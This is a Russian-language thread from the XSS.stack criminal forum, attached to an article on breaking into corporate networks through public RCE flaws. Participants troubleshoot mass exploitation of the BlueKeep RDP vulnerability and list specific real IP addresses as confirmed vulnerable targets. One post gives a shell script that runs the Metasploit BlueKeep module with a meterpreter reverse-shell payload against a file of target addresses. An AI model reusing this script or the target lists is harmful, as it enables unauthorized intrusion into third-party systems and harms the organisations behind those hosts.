• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Добываем доступы в корпы через паблик RCE

Hello, why after every ip vulnerable , it doesn't come any sessions when it's finished i get Forcing the USE of FREE'd object ... , and after it says it's vulnerable, it's dying if i scan second time (Exploit aborted due to failure: unreachable: Unable to connect to RDP service) , i must change something? the sessions are coming when i make test, and ports are open.
 
Последнее редактирование:
92.154.61.130
101.1.5.138​
100% уязвимые, тести
Спасибо! Сесси получил. Но не с первого раза. Получилось только после повторного запуска и изменения GROOMSIZE.
 
Последнее редактирование:
а есть способ найти премиум кроме как купить
Я соглашусь с вами, там в шодане и сенсис всемдотупные айпи, всезнаюшие форумчане поделитесь премиалные сорсы.
 
Cкрипт запуска сплойта.
Я запускаю Headler на одтельном сервере. Для того чтобы автоматизировать запуск сплоита использую скрипт.
При запуске указываем путь до файла с ip адресами:
sh msf_run.sh /root/vuln-ip.txt


Код:
touch msf_run.sh
echo 'msfconsole -x "use exploit/windows/rdp/cve_2019_0708_bluekeep_rce;set payload windows/x64/meterpreter/reverse_tcp_rc4;set EXITFUNC thread;set DisablePayloadHandler 1;set LHOST 127.0.0.1;set LPORT 80;set RC4PASSWORD 55555555;set ConnectTimeout 5;set GROOMSIZE 150;set GROOMCHANNELCOUNT 1;set forceexploit 1; set target 1;set rhosts file:${1};run"' > msf_run.sh
sh msf_run.sh /root/vuln-ip.txt
 
Спасибо! Сесси получил. Но не с первого раза. Получилось только после повторного запуска и изменения GROOMSIZE.
какой размер для жениха ты поставил?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх